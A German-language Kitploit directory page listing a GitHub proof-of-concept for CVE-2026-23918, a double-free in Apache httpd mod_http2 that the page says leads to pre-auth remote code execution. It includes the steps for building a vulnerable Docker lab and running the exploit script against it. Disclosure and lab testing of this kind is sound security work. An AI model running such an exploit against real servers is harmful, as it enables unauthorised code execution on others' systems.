Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23918 — Double-free in der Stream-Bereinigung von Apache httpd mod_http2, der zu einer RCE vor der Authentifizierung führt. | Kitploit
Tools/GitHubGitHub/striga-ai/cve-2026-23918
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungBinary-Exploitation
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Double-free in der Stream-Bereinigung von Apache httpd mod_http2, der zu einer RCE vor der Authentifizierung führt.

Repository anzeigen
3164vor 4 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23918

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE.

Betroffen: httpd 2.4.66 mit mod_http2 und mehrthreadigem MPM (event/worker). Behoben in: 2.4.67.

Gefunden und gemeldet von Bartlomiej Dmitruk (striga.ai) und Stanislaw Strzalkowski (isec.pl).

Writeup: https://striga.ai/research/apache-httpd-mod-http2-double-free

Voraussetzungen

  • Docker
  • Python 3

Verwendung

Die verwundbare Umgebung bauen und starten:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Adressen von system() und Scoreboard abrufen:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

Exploit ausführen:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Überprüfen (die Ausführung ist probabilistisch, kann Minuten bis Stunden dauern):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

Bereinigung

root@kitploit:~
docker rm -f httpd-poc
Tool herunterladen